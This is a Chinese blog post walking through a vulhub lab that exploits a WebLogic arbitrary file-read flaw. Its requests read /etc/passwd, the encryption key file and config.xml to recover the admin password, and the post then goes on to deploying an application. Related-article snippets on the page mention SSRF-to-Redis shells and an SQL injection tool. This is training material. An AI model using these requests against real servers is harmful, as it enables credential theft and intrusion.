漏洞复现(vulhub漏洞复现) weblogic 文件读取漏洞

最新推荐文章于 2025-01-19 17:39:27 发布
最新推荐文章于 2025-01-19 17:39:27 发布
阅读量296 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/wanghao200108/article/details/124156370
本文详细介绍了WebLogic服务器存在的文件读取漏洞,通过访问特定URL可以读取服务器上的敏感文件,如/etc/passwd。示例中展示了如何使用Burpsuite抓取并解析二进制文件,以及如何获取加密的管理员密码。利用这个漏洞,攻击者能够获取后台管理权限,进一步操作包括应用部署在内的各种功能。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

weblogic 文件读取漏洞
在这里插入图片描述
在这里插入图片描述在这里插入图片描述
访问http://192.168.15.136:7001/hello/file.jsp?path=/etc/passwd可见成功读取passwd文件
在这里插入图片描述
在这里插入图片描述
GET /hello/file.jsp?path=security/SerializedSystemIni.dat HTTP/1.1
在这里插入图片描述
是一个二进制文件,所以一定要用burpsuite来读取,用浏览器直接下载可能引入一些干扰字符。在burp里选中读取到的那一串乱码,右键copy to file就可以保存成一个文件:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
GET /hello/file.jsp?path=config/config.xml HTTP/1.1
找到其中的的值,即为加密后的管理员密码
在这里插入图片描述
在这里插入图片描述
{AES}yvGnizbUS0lga6iPA5LkrQdImFiS/DJ8Lw/yeE7Dt0k=
在这里插入图片描述
不知道为啥解不出来 Oracle@123
取到管理员密码后,登录后台。点击左侧的部署,可见一个应用列表
在这里插入图片描述
在这里插入图片描述

点击安装,选择“上载文件”:

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述在这里插入图片描述
在这里插入图片描述
在这里插入图片描述在这里插入图片描述
在这里插入图片描述

记录笔记
关注
[ vulhub漏洞复现篇 ] ImageMagick 任意文件读取漏洞 (CVE-2022-44268)
qq_51577576的博客
03-13 1473
[ vulhub漏洞复现篇 ] ImageMagick 任意文件读取漏洞 (CVE-2022-44268) 在ImageMagick 7.1.0-51版本及以前存在CVE-2022-44268漏洞。 ImageMagick 7.1.0-49 容易受到信息泄露的攻击。当它解析PNG图像(例如,调整大小)时,生成的图像可能嵌入了任意远程文件的内容(如果ImageMagick二进制文件有权读取它)。
weblogic漏洞复现
cgygsw的博客
03-31 111
save。
漏洞复现weblogic文件读取漏洞
sev1n的博客
04-16 1306
本环境模拟了一个真实的weblogic环境,其后台存在一个弱口令,并且前台存在任意文件读取漏洞。分别通过这两种漏洞,模拟对weblogic场景的渗透。
weblogic-文件读取漏洞
qq_43381463的博客
03-09 472
weblogic-文件读取漏洞
weblogic任意文件读取漏洞+后台任意上传
菜鸟耿耿
10-12 728
weblogic任意文件读取漏洞+后台任意上传 漏洞环境描述 本环境模拟了一个真实的weblogic环境,其后台存在一个弱口令,并且前台存在任意文件读取漏洞。分别通过这两种漏洞,模拟对weblogic场景的渗透。 影响版本: Weblogic版本:10.3.6(11g) Java版本:1.6 环境搭建 靶机IP: 192.168.35.144 攻击者IP:192.168.35.128 启动环境 docker-compose up -d 访问后台登陆页面:url:http://192.168.35.144
weblogic 文件打开数_Weblogic任意文件读取和任意文件上传
weixin_39586335的博客
12-03 495
引言weblogic中两个CVE漏洞比较有意思,所以复现一下,该两个漏洞需要在poc中加入用户名和密码(cookie)才能实现。环境搭建 环境搭建: 首先安装weblogic 下载地址 http://www.oracle.com/technetwork/cn/middleware/weblogic/downloads/wls-main-091116-zhs.html安装目录没特别需求可以不更改,一...
Weblogic 常规渗透测试环境(文件读取漏洞
EC_Carrot的博客
08-21 833
简介 本环境模拟了一个真实的weblogic环境,其后台存在一个弱口令,并且前台存在任意文件读取漏洞。分别通过这两种漏洞,模拟对weblogic场景的渗透。 Weblogic版本:10.3.6(11g) Java版本:1.6 弱口令: weblogic Oracle@123 复现操作 接下来我们假设不知道弱口令,那我们怎么靠文件读取来getshell呢? 本环境前台模拟了一个任意文件下载漏洞,访问http://your-ip:7001/hello/file.jsp?path=/etc/passwd可见成
SSRF——weblogic vulhub 漏洞复现及内网redis反弹shell
weixin_43774222的博客
03-17 6725
一、概述 SSRF( Server-side Request Forgery )服务端请求伪造。 很多web应用都提供了从其他的服务器上获取数据的功能。使用用户指定的URL,web应用可以获取图片,下载文件读取文件内容等。这个功能如果被恶意使用,可以利用存在缺陷的web应用作为代理攻击远程和本地的服务器。 主要攻击手段 1.可以对外网、服务器所在内网、本地进行端口扫描,获取一些服务的banner信息; 2.攻击运行在内网或本地的应用程序(比如溢出); 3.对内网web应用进行指纹识别,通过访问默认文件实现
Weblogic-弱口令+任意文件读取+Getshell漏洞复现
qq_44674058的博客
10-13 1013
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。
正方教务管理系统数据库任意操作漏洞 _ 乌云漏洞库,乌云镜像站, WooYun 漏洞库, WooYun 镜像站1
08-03
正方教务管理系统数据库任意操作漏洞 | 乌云漏洞库,乌云镜像站, WooYun 漏洞库, WooYun 镜像站Home (/) / Bugs (/bug/ind
正方教务系统新版sql注入漏洞利用工具
01-19
相信研究过正方教务系统的朋友看到过网上传播的比较多的一篇文章提的/service.asmx中的BMCheckPassword存在注入,然而现在大多数正方教务已经将BMCheckPassword移除了,导致漏洞无法利用。本人研究了/service.asmx中的其它接口,发现zfcwjk1存在同样的注入漏洞,特将注入方法写成工具供大家学习参考。 zfcwjk1似乎是一个财务类的确认接口,利用起来稍微麻烦点,需要一个目标学校的任意学号。 程序执行后,会需要用户输入三个参数。分别是: 1.目标网址 2.目标学校的任意学号 3.年份(估计是用来确定这个学号所在年份的情况,随便填个2012或者2013,不行再换) 若提示“cannot access target url”则可能是目标网址填错了或者教务系统已经将/service.asmx移除了,如果是/service.asmx被移除的话漏洞就没法再利用了。 另外,若是校内网使用则建议挂代理。。。
Weblogic任意文件读取漏洞
weixin_41182861的博客
09-25 893
复现环境 Weblogic版本:10.3.6(11g) Java版本:1.6 启动本环境:vulhub 漏洞利用方法 本环境前台模拟了一个任意文件下载漏洞,访问http://your-ip:7001/hello/file.jsp?path=/etc/passwd可见成功读取passwd文件读取后台用户密文与密钥文件 Weblogic密码使用AES(老版本3DES)加密,对称加密可解密,只需要找到用户的密文与加密时的密钥即可。这两个文件均位于base_domain下,名为SerializedS
Weblogic 常规渗透测试之利用文件读取漏洞getshell
灰太的表格的博客
11-04 2819
Weblogic 常规渗透测试之利用文件读取漏洞getshell 漏洞环境: vulhub 复现步骤: 1.起一个存在任意文件读取的demo: file,jsp存在漏洞 3.读取后台用户密文与密钥文件 weblogic密码使用AES(老版本3DES)加密,对称加密可解密,只需要找到用户的密文与加密时的密钥即可。这两个文件均位于base_domain下,名为SerializedSystemIni.dat和config.xml,在本环境中为./security/SerializedSystemIni.da
Weblogic常见漏洞详解
m0_64481831的博客
03-01 4968
Weblogic 是一个基于JavaEE架构的中间件,是用于开发、集成、部署和管理大型分布式为Web应用、网络应用和数据库应用的Java应用服务器。Weblogic由纯Java开发,被广泛应用于开发、部署和运行Java应用等适用于本地环境和云环境的企业应用。所以,Weblogic在面试当中被提到频率还蛮高的。这篇文章以vulhub靶场为辅。Weblogic中间件常见漏洞文章讲了任意文件读取和弱口令登录、未授权访问后台和HTTP请求远程代码执行、SSRF利用、XMLDecoder反序列化漏洞
Weblogic - General - 弱口令 & 任意文件读取漏洞
最新发布
Blue17 の 小窝
01-19 1056
通过前面两节,我们已经成功以管理员的身份登录了Weblogic的后台了,Weblogic与Tomcat等中间件一样,可以在上面部署应用。本章我们讲解的“任意文件读取漏洞,并不是Weblogic自身的,而是假设其站点应用中存在这么一个漏洞(可以理解为你发现了一个“任意文件读取漏洞,恰巧,这个站点又有一个Weblogic应用)我们的利用方法。在前面的弱口令漏洞中,假设你手头的字典都不管用,但是你发现了目标靶机的一个任意文件读取漏洞,那么你该如何利用该漏洞进行进一步的攻击呢?
vulhub学习笔记-Adobe ColdFusion 文件读取漏洞
ploto_cs的博客
09-11 686
Adobe ColdFusion 文件读取漏洞 一.漏洞介绍 (一)编号 CVE-2010-2861 (二)概述 Adobe ColdFusion是美国Adobe公司的一款动态Web服务器产品,其运行的CFML(ColdFusion Markup Language)是针对Web应用的一种程序设计语言。 Adobe ColdFusion 8、9版本中存在一处目录穿越漏洞,可导致未授权的用户读取服务器任意文件。 (三)影响版本 Adobe ColdFusion 8、9版本 二.操作步骤 (一)Vulhub i
Weblogic漏洞(三)之 Weblogic 弱口令、任意文件读取漏洞
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
08-29 882
这个URL路径存在任意文件读取漏洞,现在我们知道了这个路径存在任意文件读取漏洞,那我们该如何利用这个漏洞呢?现在我们打开BP,点击进入 Repeater 重放模块,重放以下的数据包获取密文(注意这里的主机IP和端口号要改成你靶机的IP和端口号)然后将文件选择为我们保存的111.dat文件,密文这里填写我们获得得密钥,然后点击确定,成功解密出密码。然后我们重新发送以下的数据包,获取密钥文件(注意这里的主机IP和端口号要改成你靶机的IP和端口号)现在我们得到了密钥的文件,然后将其保存复制下来,后面解密会用到。
中间件漏洞 | weblogic-弱口令/任意文件读取
weixin_52116519的博客
10-16 1649
一个基于JAVAEE架构的中间件,用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。通俗地讲weblogic是一种web容器,把我们开发的java应用程序运行起来,并提供服务。服务器:Microsoft Azure云服务器(学生优惠)操作系统:Linux (ubuntu 20.04)环境搭建:使用docker搭建vulhub,并使用weblogic靶场本环境模拟了一个真实的weblogic环境,其后台存在一个弱口令,并且前台存在任意文件读取漏洞
weblogic漏洞复现vulhub
08-21
复现weblogic漏洞,可以使用vulhub靶场中的weblogic服务。vulhub中提供了一些weblogic版本,包括weblogic 10.3.6.0、weblogic 12.1.3.0、weblogic 12.2.1.2和weblogic 12.2.1.3。你可以选择其中一个版本来启动weblogic服务。 你可以通过访问https://github.com/zhzyker/exphub/tree/master/weblogic获取更多关于weblogic漏洞的信息。 在vulhub的靶场上,你可以学习和复现一些weblogic漏洞。虽然还有很多其他漏洞没有被复现,但通过复现一些典型漏洞,你可以熟悉这些漏洞的原理。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [【vulhubWeblogic(CVE-2018-2894)漏洞复现](https://blog.youkuaiyun.com/qq_45300786/article/details/115579631)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* *3* [Weblogic系列漏洞复现——vulhub](https://blog.youkuaiyun.com/qq_45612828/article/details/126235627)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值